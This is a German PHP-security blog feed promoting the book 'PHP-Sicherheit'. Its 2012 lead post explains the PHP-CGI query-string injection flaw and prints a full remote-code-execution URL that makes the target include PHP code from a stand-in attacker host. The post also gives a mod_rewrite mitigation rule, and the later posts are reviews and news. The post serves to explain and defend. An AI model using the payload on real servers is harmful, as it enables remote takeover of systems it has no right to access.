PHP-Sicherheit

Neue PHP-Lücke bedroht CGI-Installationen

nospam@example.com (Christopher Kunz) — Tue, 08 May 2012 09:53:46 +0200

Eine neue Lücke, die letzte Woche zufällig (lies: unabsichtlich) veröffentlicht wurde, hält derzeit die PHP-Entwickler in Atem. Der Fehler, der seit mindestens 2004 existiert, ist auf eine fehlerhafte Implementierung der CGI-Spezifikation zurückzuführen.

Diese besagt, daß ein Query-String, der mit "-" beginnt kein "=" enthält, als Kommandozeilenargument an das ausführende CGI-Programm (hier also PHP) übergeben werden kann. Das führt in Verbindung mit unsicheren Wrapperskripten dazu, daß der Zugriff auf eine beliebige - auch leere - PHP-Datei beliebige Codeausführung ermöglicht. Beispiel (Achtung, dies ist ein Remote-Code-Exploit, nicht auf Produktionswebservern ausprobieren):
http://opferserver/irgendein.php?-n%20-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://boeserserver/php-datei.txt
Aufgeschlüsselt bedeutet dies:

-n: Ignoriere vorhandene php.ini-Dateien und setze somit Suhosin, open_basedir, allow_url_include und alle anderen Sicherheitseinstellungen außer Kraft
-d allow_url_include=On: Setze "allow_url_include" vom Default (off) auf On und erlaube die Ausführung von PHP-Code aus URLs.
-d auto_prepend_file=http://boeserserver/php-datei.txt: Füge die PHP-Datei "http://boeserserver/php-datei.txt" vor jeder Skriptausführung ein und führe sie aus.

Es gibt noch lustige andere PHP-CGI-Optionen - ein Blick in php-cgi -h ist durchaus aufschlußreich.

Innerhalb kürzester Zeit gab es für die Lücke ein Metasploit-Modul und diverse Exploits auf den üblichen Exploit-Webseiten. Eine Knowledge-Datenbank von Sony zeigte fröhlich ihren Quellcode her und Facebook reagierte mit einer lustigen Stellenanzeige.

In ihrem Update auf PHP 5.4.2 und 5.3.12 haben die Entwickler gleich zwei Fehler gemacht: So wurde übersehen, daß führender Whitespace im Query String für die Ausführung bei bestimmten, besonders unsicheren Wrapperscripts keine Auswirkung hat - und URL-kodierte Gleichheitszeichen wurden ignoriert. Zur Stunde gibt es noch keine neue PHP-Version, sie dürfte aber nicht mehr lange auf sich warten lassen. Ein initial von der PHP Group vorgeschlagener Bugfix per mod_rewrite-Regel war ebenfalls fehlerhaft, aktuell wird die (nach Meinung des Autors dieser Zeilen korrekte) folgende Regel empfohlen:



    RewriteCond %{QUERY_STRING} ^[^=]*$

    RewriteCond %{QUERY_STRING} %2d|\- [NC]

    RewriteRule .? - [F,L]

Mehr Informationen finden sich im englischen Schwesterblog dieses Blogs:

PHP 5.4.0 ist da - was sind die Änderungen?

nospam@example.com (Christopher Kunz) — Mon, 02 Apr 2012 16:04:13 +0200

Nach langer Zeit (fast anderthalb Jahre!) wird hier endlich mal wieder etwas entstaubt. Viel hat sich in den letzten Jahren getan - persönlich bei den Autoren des Buches, aber auch in der PHP-Szene. Vieles ist jedoch auch gleich geblieben...
Wir starten dieses Blog neu mit einer kleinen Übersicht der sicherheitsrelevanten Änderungen in PHP 5.4.0 - sowohl im Sprachkern als auch in den wichtigsten Sicherheits-Erweiterungen.

register_globals ist weg

Die Götter haben ein Einsehen: Nachdem die berühmt-berüchtigte Konfigurationsdirektive "register_globals" seit PHP 5.0 auf "off" stand und als deprecated - also überflüssig und abgekündigt - markiert war, ist sie nun aus PHP komplett verschwunden. Es gibt also keine per Konfiguration aktivierbare Möglichkeit mehr, Requestvariablen statt über $_{GET,POST,REQUEST} direkt mit $variable anzusprechen.
Diese Änderung dürfte gleichzeitig das Hauptproblem für Upgrades bedeuten. Wenn Ihre Skripte noch auf "register_globals on" angewiesen sind, upgraden Sie PHP nicht! Sie sollten dringend Ihre Skripte anpassen - Zeit genug hatten Sie.

Safe Mode ist weg

Den ungeliebten Safe Mode hat es auch dahingerafft. Er ist mit PHP 5.4 komplett verschwunden.

Magic quotes

Die Ini-Optionen "magic_quotes_gpc" und Konsorten sind ebenfalls verschwunden. Skriptautoren sollten sich nun nicht mehr darauf verlassen, daß automatisch quotiert wird - und ggf. mit den geeigneten Funktionen selber Quotes nachziehen.

Suhosin-Patch und Suhosin Extension

Weder Suhosin-Patch noch Suhosin-Extension existieren für PHP 5.4.0. Derzeit ist auch nicht bekannt, ob und wann sie veröffentlicht werden. Einige Paketmaintainer - unter anderem Debian - haben daher ihre Unterstützung für Suhosin in PHP zunächst eingestellt und verweisen auf spezielle Pakete oder die Möglichkeit, Suhosin von Hand einzukompilieren.
Derzeit läßt sich die Suhosin-Extension nicht mit PHP 5.4.0 übersetzen.

Exploit-Kit mit Fake-Adminkonsole

nospam@example.com (Christopher Kunz) — Wed, 03 Nov 2010 09:54:22 +0100

Das "EFTPS"-Exploit-Toolkit hat laut diesem Blogbericht eine zusätzliche, komplett gefälschte Adminkonsole, die über leicht ratbare Paßworte ("admin"/"admin" etc.) "gehackt" werden kann und dann einige falsche Statistiken anzeigt. Diese Konsole loggt aber IP und sonstige Vitaldaten jedes Besuchers für die spätere Verwendung.

Die Idee ist drollig - insbesondere, wenn das ganze Schule macht, können sich Administratoren, die ein Exploit-Toolkit auf einem Server finden, bei der Analyse auf ein ganzes Stück Mehrarbeit einstellen...

Neuer "Month of PHP Security"

nospam@example.com (Administrator) — Sat, 27 Feb 2010 19:35:04 +0100

Mein Co-Autor Stefan Esser richtet zusammen mit SyScan und seiner Firma SektionEins einen neuen "Month of PHP Security" aus.

Der ganze Mai 2010 wird im Zeichen der PHP-Sicherheit stehen.

Anders als beim erstmaligen Sicherheitsmonat, in dem Stefan (soweit ich mich erinnere) alle Sicherheitslücken und Advisories selber erarbeitet hat, ist nun die Mithilfe der Community gefragt.

In einem CfP auf php-security.org ruft Stefan zu folgenden Beiträgen auf:

Neue Lücke in PHP selber, inkl. Lösungsvorschlag an die Entwickler
Neue Lücke in beliebter PHP-Extension etc. (also z.B. in eAccelerator, APC oder Suhosin )
Detaillierter Artikel zu einem Aspekt von PHP-Sicherheit
"Komplizierter" Exploit gegen eine bekannte PHP-Anwendung
"Komplizierter" theoretischer Artikel über Angriffe gegen PHP (Beispiel: wie erzeugt man Heap Overflows)
Anleitung zum Angriff gegen verschlüsselte PHP-Anwendungen
Veröffentlichung eines neuen PHP Security Werkzeugs
Oder irgendwas anderes, was mit PHP Security zu tun hat

Am Ende des PHP-Security-Monats gibt's Preise für die besten Einsendungen, darunter Tickets für die Syscan 2010 (ohne Hotel- und Reisekosten), Lizenzen für CodeScan PHP und Amazon-Gutscheine.

Mehr Informationen gibt es unter http://www.php-security.org/ .

Rezension im Linux-Magazin 09/08

nospam@example.com (Christopher Kunz) — Fri, 12 Sep 2008 09:37:39 +0200

Das Linux-Magazin rezensiert in seiner vorigen Ausgabe (September 2008) die 3. Auflage des Buches "PHP-Sicherheit". Fazit:

Schön, daß dieses lehrreiche und notwendige Buch nach der vergriffenen zweiten Auflage wieder erhältlich ist - wenn auch mit wenig Neuem.

Recht haben sie, die Kollegen - denn die dritte Auflage war von vorneherein nur als "Bugfix Release" gedacht. Anders als in der Softwarebranche sind Versionsnummern à la "2.1" aber bei Druckerzeugnissen eher nicht üblich.

Buchvorstellung in der Online-Ausgabe der "PC Welt"

nospam@example.com (Christopher Kunz) — Fri, 12 Sep 2008 08:50:05 +0200

Die Zeitschrift "PC Welt" widmet der dritten Auflage von "PHP-Sicherheit" eine ausführliche Besprechung.
So heißt es dort:

Das macht die Lektüre spezieller Fachliteratur zur Pflichtaufgabe jedes Programmierers und Server- beziehungsweise Datenbankadministrators. Das Buch "PHP-Sicherheit" aus dem dpunkt-Verlag ist so eine Pflichtlektüre und eine sehr gute obendrein.

Fazit der Rezension:

Mit einem Buch hat man alle derzeit denkbaren Angriffsstechniken und -Szenarien und -Schwachstellenbeschreibung zur Hand - das ist die Stärke dieses spezialisierten Werkes, dessen Preis von 36 Euro wirklich gut angelegt ist.

Die vollständige Besprechung finden Sie hier: Besprechung "PHP-Sicherheit" in PC-Welt.

Schulung "PHP-Sicherheit" mit Peter Prochaska

nospam@example.com (Christopher Kunz) — Thu, 11 Sep 2008 16:37:47 +0200

Unser Ko-Autor Peter Prochaska veranstaltet wieder eine Schulung im Linuxhotel:

Vom 22.09.08 bis 24.09.08 findet im Linuxhotel in Essen-Horst eine PHP-Sicherheitsschulung mit mir statt. Es sind noch wenige Plätze frei. Ich würde mich freuen, ein paar von euch mal persönlich kennenzulernen.

Die Kursbeschreibung findet Ihr unter: Kursbeschreibung "PHP-Sicherheit"

Hier der Link zur Anmeldung: Anmeldung PHP-Sicherheitskurs

In den vergangenen Jahren war das Buch "PHP-Sicherheit" stets kursbegleitende Lektüre.

Ich (Christopher) habe in der Vergangenheit mit Peter zusammen diese Schulungen im Linuxhotel gehalten und kann die Location nur empfehlen - den Referenten sowieso. Es wird für den Preis eine sehr intensive Lernatmosphäre geboten und die Verpflegung & Infrastruktur ist auch vom Feinsten. Leider kann ich ja nicht mehr dabei sein (aus beruflichen Gründen), wünsche Peter und allen Teilnehmern jedoch viel Spaß und maximalen Lernerfolg!

Neue Rezension zur dritten Auflage

nospam@example.com (Christopher Kunz) — Fri, 04 Jul 2008 11:26:01 +0200

Von Garvin Hicking, Autor des offiziellen Handbuches zu Serendipity, dem Weblog-System, das auch für diese Website verwendet wird, kommt eine erste Rezension zur dritten Auflage:

Die dritte Auflage des Buches "PHP-Sicherheit" trägt nach wie vor zu Recht einen schlagkräftigen Namen. Allein das Inhaltsverzeichnis liest sich wie eine Offenbarung aller Schlüsselwörter, die man im Zusammenhang mit "Security" jemals gehört haben sollte.
Wäre sich jeder Web-Entwickler der angesprochenen (Un)Sicherheitsmethoden bewusst, die das Buch einsteigerfreundlich von Grund auf erklärt, würde es vermutlich keine Anwendungen mit Hack-Ansätzen mehr geben.
[..]
Zu kaum einem anderen Web-Thema kann man ein Buch so nachdrücklich empfehlen und als Pflichtlektüre ans Herz legen.

Mehr können Sie auf Garvins Blog lesen: Rezension zu PHP-Sicherheit, 3. Auflage

Neuer Artikel online: PKI Login with PHP

nospam@example.com (Christopher Kunz) — Fri, 30 May 2008 15:42:37 +0200

Mit dem Thema "Authentifizierung per X.509-Zertifikat und PHP" beschäftigt sich ein kurzer englischer Artikel von mir auf dem "Schwesterblog" php-security.net. Er trägt den Titel "X.509 PKI login with PHP and Apache" und ist für den Einen oder Anderen vielleicht interessant. Anders als der sehr allgemein gehaltene SSL-Artikel im Buch "Sichere Webanwendungen mit PHP" versuche ich auch zu beschreiben, warum X.509-Zertifikate gute Authentifizierungstokens sind (sie sind nämlich vertrauenswürdig!) und wie man sie ganz konkret in die eigene bestehende Anwendung einbindet.

Zweite Auflage ausverkauft, dritte Auflage unterwegs

nospam@example.com (Christopher Kunz) — Tue, 20 May 2008 09:16:52 +0200

Coverillustration PHP-Sicherheit Auflage 3

Die zweite Auflage unseres Buches ist nun bei allen großen Online-Buchhändlern ausverkauft und vermutlich nur noch gebraucht oder antiquarisch zu bekommen. Höchste Zeit, die dritte Auflage fertig zu bekommen - und seit gestern haben wir nun auch eine Coverillustration. Wie bei den zwei vorherigen Auflagen ist die Basisillustration dieselbe geblieben - die Farbe hat sich jedoch noch einmal geändert und ist einem Signalrot, das meiner Meinung nach gut zur Thematik paßt, gewichen.

Die dritte Auflage wird mit einigen Überarbeitungen und etwas neuem Inhalt im Juni erscheinen. Wer das Buch noch nicht hat, sollte spätestens dann zugreifen!

PHP-Sicherheit

nospam@example.com (Christopher Kunz) — Tue, 08 Apr 2008 09:53:47 +0200

Dritte überarbeitete Auflage jetzt im Buchhandel erhältlich

Christopher Kunz / Stefan Esser / Peter Prochaska

PHP-Sicherheit

PHP/MySQL-Webanwendungen sicher programmieren

PHP gilt mittlerweile als die beliebteste Skriptsprache für
Webanwendungen. Leider werden Sicherheitsaspekte bei der
PHP-Entwicklung oft vernachlässigt. Dies führt leicht zu massiven
Sicherheitsproblemen und ist dann für kompromittierte Server und
verunstaltete Webseiten verantwortlich. Wie man solche Risiken erkennen
und abwehren kann, zeigt dieses Buch.

An nachvollziehbaren Beispielen lernen die Leser alle wichtigen Gefahren kennen, u.a.:

SQL-Injection
Cross-Site Scripting
Angriffe gegen Sessions
Angriffe auf Upload-Formulare
Cross-Site Request Forgery
HTTP Response Splitting

Darauf aufbauend vermitteln die Autoren effiziente Vorbeugungs- und Gegenmaßnahmen, z.B.:

Sichere Konfiguration von PHP
Filterung mit mod_security
Richtige Überprüfung von Variablen
Blacklist-/Whitelist-Prüfungen
Prepared Statements und Stored Procedures
Captchas

Die Leser lernen, welche Fehler sie bei der Umsetzung ihrer Ideen
in PHP vermeiden sollten. Außerdem können sie anhand der im Buch
genannten "Best Practices" ihren eigenen Programmierstil kritisch
überprüfen und schnell in die Fehlersuche einsteigen. Die Checkliste im
Anhang bietet eine Anleitung für Code Audits und für die Absicherung
von Projekten.

Die zweite Auflage wurde gründlich überarbeitet, aktualisiert und
an aktuelle Neuerungen wie PHP 5.2.0 angepasst. In einem zusätzlichen
Kapitel stellen die Autoren die neue PHP-Erweiterung zur Filterung von
Eingabedaten vor.

Zielgruppe:

PHP-Entwickler
Administratoren von Hosting-/Anwendungsservern

Dritte Auflage in Arbeit

nospam@example.com (Christopher Kunz) — Tue, 08 Apr 2008 09:09:33 +0200

Die dritte Auflage unseres Buches ist nun in Arbeit. Momentan bin ich dabei, die vom Fachlektorat angemerkten Korrekturen einzupflegen, danach geht das Buch ins Layout und dann hoffentlich ohne weitere Verzögerung in den Druck.
Es handelt sich bei der dritten - anders als der zweiten Auflage - nicht um eine inhaltlich wesentlich erweiterte Version, sondern um eine Korrekturauflage. Da die zweite Auflage praktisch ausverkauft ist (der Verlag hat keine Exemplare mehr, in Buchhandlungen bzw. online sind noch Reste verfügbar), muß in Bälde neu aufgelegt werden. Gestern kam nun der neue dpunkt-Verlagskatalog mit der Ankündigung der dritten Auflage hinzu.
Neben den üblichen Typofixes und Errata (vielen Dank an dieser Stelle an alle Einsender!) haben wir das Kapitel über Suhosin/Hardened PHP nochmals überarbeitet, das Kapitel zu Authentifizierung/Autorisierung inhaltlich etwas geradegezogen (u.a. auch mit einer kurzen Einführung der Begriffe Authentisierung, Authentifizierung, Autorisierung) und an anderen Stellen Aktualisierungen eingepflegt.
Alle Besitzer der zweiten Auflage sollten zumindest einen Blick hineinwerfen, für die Käufer der ersten Auflage unseres Buches bietet sich ein Kauf aber langsam an - denn zusammen mit den in die zweite Auflage eingeflossenen Änderungen hat sich doch deutlich was getan...
Für die vierte Auflage planen wir neue Inhalte, aber auch Anpassungen an das dann hoffentlich verfügbare PHP 6. Wer noch Anregungen für uns hat, was wir besser machen können oder wozu wir mal etwas schreiben könnten - immer her damit!

Neue Lesermeinung auf amazon.de

nospam@example.com (Christopher Kunz) — Fri, 19 Oct 2007 14:30:11 +0200

Lars H. Korte schreibt:

Das Buch sollte mir einen kleinen Einblick in die Welt der PHP-Sicherheit geben. Ich war neugierig, was es für Möglichkeiten gibt, in PHP-Anwendungen einzubrechen und wie ich meine Anwendungen gegen "böse Buben und Mädels" schützen kann.

Ich muss sagen, dass ich bei weitem nicht gedacht hätte, wie viele Angriffsmöglichkeiten und Schwachstellen es heutzutage geben kann (Session Fixation, Cross-Site Request Forgery, SQL-Injection, uvm.). Das Buch hat mir sehr geholfen, meinen Horizont in dieser Hinsicht zu erweitern.

Es werden eine Menge Angriffsmöglichkeiten erklärt und ein möglicher Schutz dagegen erläutert. Bei einigen Angriffsarten waren mir die Gedankengänge der Autoren ab und zu leider etwas zu abstrus bzw. zu theoretisch erklärt und nur schwer nachvollziehbar. Bei einigen Angriffen wurde gezeigt, welchen Code man braucht, um zu "hacken" und bei anderen wurde leider nur theoretisch beschrieben, wie "Schadcode" eingeschleust werden kann. Hier hätte ich gerne auch noch ein handfestes Praxis-Beispiel gesehen, da in mir leider nicht so viel kriminelle Energie schlummert, als dass ich mir sowas selbst ausdenken könnte

Die Anschaffung des Buches hat für mich zu 100% gelohnt und ich kann es ohne schlechtes Gewissen wärmstens weiterempfehlen!

Neues Leserfeedback

nospam@example.com (Christopher Kunz) — Fri, 19 Oct 2007 13:56:31 +0200

Thorsten Wisser schreibt:

Übrigens: großes Lob an Euch, ist ein super Buch, habe die 1. Auflage.
Hat mir sehr geholfen!!!

Erste Rezension zur zweiten Auflage

nospam@example.com (Christopher Kunz) — Wed, 25 Apr 2007 23:29:30 +0200

Von Pelle Boese kommt die erste Rezension zur Zweiten Auflage unseres Buches - vielen Dank für die freundlichen Worte!

Die aktualisierte zweite Auflage des Buches von Christopher Kunz und Peter Prochaska, die über 50 Seiten mehr als die erste Auflage bietet, ist eine lohnende - in meinen Augen sogar dringend notwendige - Anschaffung für PHP Entwickler und Systemadministratoren, aber auch für Entwickler die mit anderen Sprachen im Web-Bereich arbeiten. Besonders die Kapitel über Parametermanipulation, Cross-Site-Scripting und SQL-Injections sind, bis auf die Beispiele in PHP, sprachübergreifend.
[...]
Meiner Meinung nach ist dieses Buch die Referenz im PHP-Security-Bereich. Die vollständige Übersicht über mögliche Attacken und Präventionsmöglichkeiten gibt es - meines Erachtens nach - nirgends sonst in einem Buch vereint. Ein Must-Have, auch für stolze Besitzer der ersten Auflage.

Die vollständige Rezension können Sie auf amazon.de nachlesen.